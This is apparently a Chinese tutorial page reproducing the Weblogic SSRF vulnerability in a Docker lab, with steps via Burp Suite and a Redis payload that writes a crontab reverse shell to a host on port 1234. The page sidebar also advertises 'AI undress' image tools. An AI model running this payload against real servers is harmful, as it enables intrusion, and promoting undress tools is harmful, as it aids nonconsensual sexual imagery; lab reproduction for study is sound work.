如何实现Weblogic SSRF漏洞复现
一、使用docker搭建环境
docker安装及搭建环境教程:https://www.freebuf.com/sectool/252257.html
访问7001端口
二、漏洞复现步骤
1、漏洞存在页面 /uddiexplorer/SearchPublicRegistries.jsp
2、检查一下IBM这个地方看看
发现是个连接,这就可能存在ssrf了
3、使用burp suite抓包,点击Search
4、修改operator参数的连接
5、访问结果
访问不存在的端口返回 could not connect over HTTP
访问存在的端口返回状态码
访问内网
利用redis反弹shell的payload
set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/192.168.220.151/1234 0>&1\n\n\n\n" config set dir /etc/ config set dbfilename crontab save
以上是如何实现Weblogic SSRF漏洞复现的详细内容。更多信息请关注PHP中文网其他相关文章!
热AI工具
Undresser.AI Undress
人工智能驱动的应用程序,用于创建逼真的裸体照片
AI Clothes Remover
用于从照片中去除衣服的在线人工智能工具。
Undress AI Tool
免费脱衣服图片
Clothoff.io
AI脱衣机
Video Face Swap
使用我们完全免费的人工智能换脸工具轻松在任何视频中换脸!
热门文章
热工具
记事本++7.3.1
好用且免费的代码编辑器
SublimeText3汉化版
中文版,非常好用
禅工作室 13.0.1
功能强大的PHP集成开发环境
Dreamweaver CS6
视觉化网页开发工具
SublimeText3 Mac版
神级代码编辑软件(SublimeText3)
比较和区分WebLogic与Tomcat的功能
Dec 28, 2023 am 11:41 AM
WebLogic和Tomcat是两个常用的Java应用服务器,它们在功能和特点上有一些区别。本文将为读者介绍WebLogic和Tomcat的主要功能对比与区别。WebLogic是由Oracle公司开发和维护的一款Java应用服务器。它作为一个完整的JavaEE(JavaEnterpriseEdition)应用服务器,提供了丰富的功能和高度的可靠性。Web
weblogic攻击手法有哪些
May 16, 2023 am 11:16 AM
简介weblogic服务器的特点为架构庞大复杂,蓝队一般很难防御,且多部署于外网。而且weblogic的攻击成本比较低,只要存在漏洞,一般可以直接获取目标服务器的root权限。在攻防演习中被各大攻击队,防守方重点关注。当然,目前网上公开的各种exp程序,当然也包括我自己的工具,或多或少都有点问题。于是近期在朋友的要求下,整理了部分攻击方法以及”完美“利用。红队可以用来完善自己的工具,蓝队可以用来写溯源报告。一、探测weblogic是否存在漏洞目前网上公开的资料中,没有一种比较好的方法去判断web
WebLogic与Tomcat的扩展性及差异
Dec 28, 2023 am 09:38 AM
WebLogic和Tomcat是两种常用的Java应用服务器,它们在可扩展性和功能方面存在着一些区别。本文将分析这两个服务器的可扩展性,并比较它们之间的区别。首先,我们来看一下WebLogic的可扩展性。WebLogic是由Oracle开发的高度可扩展的Java应用服务器。它提供了许多高级功能,包括事务管理、JDBC连接池、分布式缓存等。WebLogic支持
springboot部署到weblogic中jar包冲突如何解决
May 11, 2023 pm 05:10 PM
背景某项目,客户要求使用已有的weblogic部署已经开发好的springboot,于是乎对springboot进行了部分配置的调整,主要包括去除tomcat依赖,增加启动类的处理。一般都会比较顺利,实际上总会遇到些小问题。问题1打包后发布到weblogic上启动时,如下图所示的错误:从异常内容可以很容易判断出,这是jar包冲突导致的错误。经过定位,weblogic有个目录wls12213\oracle_common\modules\thirdparty,其中存放了一些第三方的默认的jar包,项
如何实现Weblogic SSRF漏洞复现
May 14, 2023 pm 08:04 PM
一、使用docker搭建环境docker安装及搭建环境教程:https://www.freebuf.com/sectool/252257.html访问7001端口二、漏洞复现步骤1、漏洞存在页面/uddiexplorer/SearchPublicRegistries.jsp2、检查一下IBM这个地方看看发现是个连接,这就可能存在ssrf了3、使用burpsuite抓包,点击Search4、修改operator参数的连接5、访问结果访问不存在的端口返回couldnotconnectoverHTTP
weblogic和tomcat有哪些区别
Dec 27, 2023 pm 03:49 PM
weblogic和tomcat的区别:1、功能;2、性能;3、规模;4、价格;5、安全性;6、配置和管理;7、社区支持;8、集成能力;9、升级和更新;10、可靠性。详细介绍:1、功能,Weblogic具有强大的功能,包括事务管理、消息队列、数据库连接处理等,还支持EJB和JMS等Java技术标准,而Tomcat主要专注于Servlet和JSP技术的实现等等。
Go中的SSRF攻防战
Jul 24, 2023 pm 02:05 PM
SSRF英文全拼为Server Side Request Forgery,翻译为服务端请求伪造。攻击者在未能取得服务器权限时,利用服务器漏洞以服务器的身份发送一条构造好的请求给服务器所在内网。
Redis中服务端请求伪造SSRF的示例分析
May 30, 2023 am 09:18 AM
SSRF,即服务端请求伪造。当服务器需要请求资源时,请求的资源、协议、路径等可被用户控制。即可造成SSRF攻击。本文着重研究通过gopher协议,对Redis服务进行SSRF攻击,进而getshell。gopher协议格式首先先了解gopher协议为何物,格式是什么样子:gopher://://_后接TCP数据流在我们测试攻击redis时,可以使用linux自带的curl进行测试。如果使用Centos,为了确保实验成功,最好将Centos的selinux关闭。关闭selinux:setenfor
